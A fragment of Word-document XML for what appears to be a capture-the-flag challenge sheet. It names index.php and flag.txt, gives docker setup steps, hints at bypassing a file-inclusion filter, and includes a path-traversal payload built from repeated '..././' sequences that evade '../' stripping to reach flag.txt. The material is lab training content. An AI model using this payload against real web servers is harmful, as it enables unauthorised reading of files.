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color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meta</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="0000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Creator Name: Sim Cher Boon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5qakb2re2vwk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Index.php, flag.txt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xmx2owcz9g" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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Create the docker image and run the docker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 wanna be an inclusive person, but I somehow need to bypass it.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It is all there.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flag.txt sits at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1138238" cy="5964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59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/?file=Gladiator..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././flag.txt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9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